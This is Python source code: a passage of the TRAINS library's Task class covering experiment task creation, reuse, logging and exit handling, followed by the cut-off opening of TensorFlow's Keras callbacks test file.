'Task object cannot be instantiated externally, use Task.current_task() or Task.get_task(...)')
self._lock = threading.RLock()
super(Task, self).__init__(**kwargs)
self._arguments = _Arguments(self)
self._logger = None
self._last_input_model_id = None
self._connected_output_model = None
self._dev_worker = None
self._connected_parameter_type = None
self._detect_repo_async_thread = None
self._resource_monitor = None
# register atexit, so that we mark the task as stopped
self._at_exit_called = False
self.__register_at_exit(self._at_exit)
@classmethod
def current_task(cls):
"""
Return the Current Task object for the main execution task (task context).
:return: Task() object or None
"""
return cls.__main_task
@classmethod
def init(
cls,
project_name=None,
task_name=None,
task_type=TaskTypes.training,
reuse_last_task_id=True,
output_uri=None,
auto_connect_arg_parser=True,
auto_connect_frameworks=True,
auto_resource_monitoring=True,
):
"""
Return the Task object for the main execution task (task context).
:param project_name: project to create the task in (if project doesn't exist, it will be created)
:param task_name: task name to be created (in development mode, not when running remotely)
:param task_type: task type to be created (in development mode, not when running remotely)
:param reuse_last_task_id: start with the previously used task id (stored in the data cache folder). \
if False every time we call the function we create a new task with the same name \
Notice! The reused task will be reset. (when running remotely, the usual behaviour applies) \
Note: A closed or published task will not be reused, and a new task will be created.
:param output_uri: Default location for output models (currently support folder/S3/GS/ ).
notice: sub-folders (task_id) is created in the destination folder for all outputs.
:param auto_connect_arg_parser: Automatically grab the ArgParser and connect it with the task.
if set to false, you can manually connect the ArgParser with task.connect(parser)
:param auto_connect_frameworks: If true automatically patch MatplotLib, Keras callbacks, and TensorBoard/X to
serialize plots, graphs and model location to trains backend (in addition to original output destination)
:param auto_resource_monitoring: If true, machine vitals will be sent along side the task scalars,
Resources graphs will appear under the title ':resource monitor:' in the scalars tab.
:return: Task() object
"""
def verify_defaults_match():
validate = [
('project name', project_name, cls.__main_task.get_project_name()),
('task name', task_name, cls.__main_task.name),
('task type', str(task_type), str(cls.__main_task.task_type)),
]
for field, default, current in validate:
if default is not None and default != current:
raise UsageError(
"Current task already created "
"and requested {field} '{default}' does not match current {field} '{current}'".format(
field=field,
default=default,
current=current,
)
)
if cls.__main_task is not None:
if not running_remotely():
verify_defaults_match()
return cls.__main_task
# check that we are not a child process, in that case do nothing
if PROC_MASTER_ID_ENV_VAR.get() and PROC_MASTER_ID_ENV_VAR.get() != os.getpid():
class _TaskStub(object):
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, attr):
return self
def __setattr__(self, attr, val):
pass
return _TaskStub()
# set us as master process
PROC_MASTER_ID_ENV_VAR.set(os.getpid())
if task_type is None:
# Backwards compatibility: if called from Task.current_task and task_type
# was not specified, keep legacy default value of TaskTypes.training
task_type = cls.TaskTypes.training
try:
if not running_remotely():
task = cls._create_dev_task(
project_name,
task_name,
task_type,
reuse_last_task_id,
)
if output_uri:
task.output_uri = output_uri
else:
task = cls(
private=cls.__create_protection,
task_id=get_remote_task_id(),
log_to_backend=False,
)
except Exception:
raise
else:
Task.__main_task = task
# Patch argparse to be aware of the current task
argparser_update_currenttask(Task.__main_task)
EnvironmentBind.update_current_task(Task.__main_task)
if auto_connect_frameworks:
PatchedMatplotlib.update_current_task(Task.__main_task)
PatchAbsl.update_current_task(Task.__main_task)
PatchSummaryToEventTransformer.update_current_task(task)
# PatchModelCheckPointCallback.update_current_task(task)
PatchTensorFlowEager.update_current_task(task)
PatchKerasModelIO.update_current_task(task)
PatchTensorflowModelIO.update_current_task(task)
PatchPyTorchModelIO.update_current_task(task)
if auto_resource_monitoring:
task._resource_monitor = ResourceMonitor(task)
task._resource_monitor.start()
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser=parser, parsed_args=parsed_args)
# make sure all random generators are initialized with new seed
make_deterministic(task.get_random_seed())
if auto_connect_arg_parser:
# Patch ArgParser to be aware of the current task
argparser_update_currenttask(Task.__main_task)
# Check if parse args already called. If so, sync task parameters with parser
if argparser_parseargs_called():
parser, parsed_args = get_argparser_last_args()
task._connect_argparse(parser, parsed_args=parsed_args)
# Make sure we start the logger, it will patch the main logging object and pipe all output
# if we are running locally and using development mode worker, we will pipe all stdout to logger.
# The logger will automatically take care of all patching (we just need to make sure to initialize it)
task.get_logger()
# Make sure we start the dev worker if required, otherwise it will only be started when we write
# something to the log.
task._dev_mode_task_start()
return task
@classmethod
def create(
cls,
task_name=None,
project_name=None,
task_type=TaskTypes.training,
):
"""
Create a new Task object, regardless of the main execution task (Task.init).
Notice: This function will always create a new task, whether running in development or remote execution mode.
:param task_name: task name to be created
:param project_name: Project to create the task in.
If project is None, and the main execution task is initialized (Task.init), its project will be used.
If project is provided but doesn't exist, it will be created.
:param task_type: Task type to be created. (default: "training")
Optional Task types are: "training" / "testing" / "dataset_import" / "annotation" / "annotation_manual"
:return: Task() object
"""
if not project_name:
if not cls.__main_task:
raise ValueError("Please provide project_name, no global task context found "
"(Task.current_task hasn't been called)")
project_name = cls.__main_task.get_project_name()
try:
task = cls(
private=cls.__create_protection,
project_name=project_name,
task_name=task_name,
task_type=task_type,
log_to_backend=False,
force_create=True,
)
except Exception:
raise
return task
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if result:
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get():
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
closed_old_task = cls.__close_timed_out_task(default_task)
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
if ((task.status in (tasks.TaskStatusEnum.published, tasks.TaskStatusEnum.closed))
or (ARCHIVED_TAG in task.data.tags) or task.output_model_id):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# set development tags
task.set_tags([cls._development_tag])
# clear task parameters, they are not cleared by the Task reset
task.set_parameters({}, __update=False)
# clear the comment, it is not cleared on reset
task.set_comment(make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
# clear the input model (and task model design/labels)
task.set_input_model(model_id='', update_task_design=False, update_task_labels=False)
task.set_model_config(config_text='')
task.set_model_label_enumeration({})
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.console('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id:
logger.console('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
else:
logger.console('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# show the debug metrics page in the log, it is very convenient
logger.console(
'TRAINS results page: {}/projects/{}/experiments/{}/output/log'.format(
task._get_app_server(),
task.project if task.project is not None else '*',
task.id,
),
)
# make sure everything is in sync
task.reload()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
@staticmethod
def get_task(task_id=None, project_name=None, task_name=None):
"""
Returns Task object based on either, task_id (system uuid) or task name
:param task_id: unique task id string (if exists other parameters are ignored)
:param project_name: project name (str) the task belogs to
:param task_name: task name (str) in within the selected project
:return: Task object
"""
return Task.__get_task(task_id=task_id, project_name=project_name, task_name=task_name)
@property
def output_uri(self):
return self.storage_uri
@output_uri.setter
def output_uri(self, value):
self.storage_uri = value
def set_comment(self, comment):
"""
Set a comment text to the task.
In remote, this is a no-op.
:param comment: The comment of the task
:type comment: str
"""
if not running_remotely() or not self.is_main_task():
self._edit(comment=comment)
self.reload()
def add_tags(self, tags):
"""
Add tags to this task. Old tags are not deleted
In remote, this is a no-op.
:param tags: An iterable or space separated string of new tags (string) to add.
:type tags: str or iterable of str
"""
if not running_remotely() or not self.is_main_task():
if isinstance(tags, six.string_types):
tags = tags.split(" ")
self.data.tags.extend(tags)
self._edit(tags=list(set(self.data.tags)))
def connect(self, mutable):
"""
Connect an object to a task (see introduction to Task connect design)
:param mutable: can be any object Task supports integrating with:
- argparse : for argument passing
- dict : for argument passing
- TaskParameters : for argument passing
- model : for initial model warmup or model update/snapshot uploads
:return: connect_task() return value if supported
:raise: raise exception on unsupported objects
"""
dispatch = OrderedDict((
(OutputModel, self._connect_output_model),
(InputModel, self._connect_input_model),
(ArgumentParser, self._connect_argparse),
(dict, self._connect_dictionary),
(TaskParameters, self._connect_task_parameters),
))
for mutable_type, method in dispatch.items():
if isinstance(mutable, mutable_type):
return method(mutable)
raise Exception('Unsupported mutable type %s: no connect function found' % type(mutable).__name__)
def get_logger(self, flush_period=NotSet):
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None of any other False value, will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: .Logger object
"""
if not self._logger:
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def mark_started(self):
"""
Manually Mark the task as started (will happen automatically)
"""
# UI won't let us see metrics if we're not started
self.started()
self.reload()
def mark_stopped(self):
"""
Manually Mark the task as stopped (also used in self._at_exit)
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped()
def flush(self, wait_for_uploads=False):
"""
flush any outstanding reports or console logs
:param wait_for_uploads: if True the flush will exit only after all outstanding uploads are completed
:return: True
"""
# wait for detection repo sync
if self._detect_repo_async_thread:
with self._lock:
if self._detect_repo_async_thread:
try:
self._detect_repo_async_thread.join()
self._detect_repo_async_thread = None
except Exception:
pass
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
self.reporter.flush()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
"""
Reset the task. Task will be reloaded following a successful reset.
Notice: when running remotely the task will not be reset (as it will clear all logs and metrics)
:param set_started_on_success: automatically set started if reset was successful
:param force: force task reset even if running remotely
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
def close(self):
"""
Close the current Task. Enables to manually shutdown the task.
Should only be called if you are absolutely sure there is no need for the Task.
"""
self._at_exit()
self._at_exit_called = False
def is_current_task(self):
"""
Check if this task is the main task (returned by Task.init())
NOTE: This call is deprecated. Please use Task.is_main_task()
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the current task
"""
return self.is_main_task()
def is_main_task(self):
"""
Check if this task is the main task (returned by Task.init())
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the current task
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
"""
Set Task model configuration text/dict (before creating an output model)
When an output model is created it will inherit these properties
:param config_text: model configuration (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def get_model_config_text(self):
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return model config_text (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
"""
return super(Task, self).get_model_design()
def get_model_config_dict(self):
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return model config_text (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
"""
config_text = self.get_model_config_text()
return OutputModel._text_to_config_dict(config_text)
def set_model_label_enumeration(self, enumeration=None):
"""
Set Task output label enumeration (before creating an output model)
When an output model is created it will inherit these properties
:param enumeration: dictionary of string to integer, enumerating the model output to labels
example: {'background': 0 , 'person': 1}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
"""
Return the last reported iteration (i.e. the maximum iteration the task reported a metric for)
Notice, this is not a cached call, it will ask the backend for the answer (no local caching)
:return integer, last reported iteration number
"""
self.reload()
return self.data.last_iteration
def set_last_iteration(self, last_iteration):
"""
Forcefully set the last reported iteration
(i.e. the maximum iteration the task reported a metric for)
:param last_iteration: last reported iteration number
:type last_iteration: integer
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
@classmethod
def set_credentials(cls, host=None, key=None, secret=None):
"""
Set new default TRAINS-server host and credentials
These configurations will be overridden by wither OS environment variables or trains.conf configuration file
Notice: credentials needs to be set prior to Task initialization
:param host: host url, example: host='http://localhost:8008'
:type host: str
:param key: user key/secret pair, example: key='thisisakey123'
:type key: str
:param secret: user key/secret pair, example: secret='thisisseceret123'
:type secret: str
"""
if host:
Session.default_host = host
if key:
Session.default_key = key
if secret:
Session.default_secret = secret
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, an then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.warning('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
_parser, _parsed_args = get_argparser_last_args()
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
# This hack prevents Argparse from crashing when running remotely with different set of parameters
sys.argv = sys.argv[:1]
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(parser, args=args, namespace=namespace, parsed_args=parsed_args)
def _connect_dictionary(self, dictionary):
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if running_remotely() and self.is_main_task():
dictionary = self._arguments.copy_to_dict(dictionary)
else:
dictionary = self._arguments.copy_from_dict(dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
# Store uncommitted code changes
self._store_uncommitted_code_changes()
def _store_uncommitted_code_changes(self):
if running_remotely() or not self.is_main_task():
return
if not self.__store_diff_on_train:
# Feature turned off
return
return
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.get_logger().warn(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
include_parent = True
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task():
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _at_exit(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
if self._at_exit_called:
return
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
if not running_remotely() and self.is_main_task():
# check if we crashed, ot the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
if self.__exit_hook.exception is not None or \
(not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None:
task_status = ('completed', )
else:
task_status = ('stopped', )
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or self.reporter.get_num_results() > 0):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
if print_done_waiting:
self.log.info('Finished uploading')
else:
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
self._logger.set_flush_period(None)
# this is so in theory we can close a main task and start a new one
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
@classmethod
def __register_at_exit(cls, exit_callback):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
atexit.register(self._exit_callback)
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
atexit.register(self._exit_callback)
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for s in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[s] = signal.getsignal(s)
signal.signal(s, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
elif cls.__main_task is None:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id],
name=exact_match_regex(task_name),
only_fields=['id', 'name']
)
)
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out i.e it was last use in the previous 24 hours.
2. It's name, project and type match the data in the server, so not
to override user changes made by using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True if the task is relevant for reuse, False if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(str(server_data) == str(task_data.get(task_data_key)) for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
tasks.TaskStatusEnum.stopped,
tasks.TaskStatusEnum.published,
tasks.TaskStatusEnum.publishing,
tasks.TaskStatusEnum.closed,
tasks.TaskStatusEnum.failed,
tasks.TaskStatusEnum.completed,
)
if task.status not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.keras.optimizer_v2 import learning_rate_schedule
from tensorflow.python.keras.utils import np_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
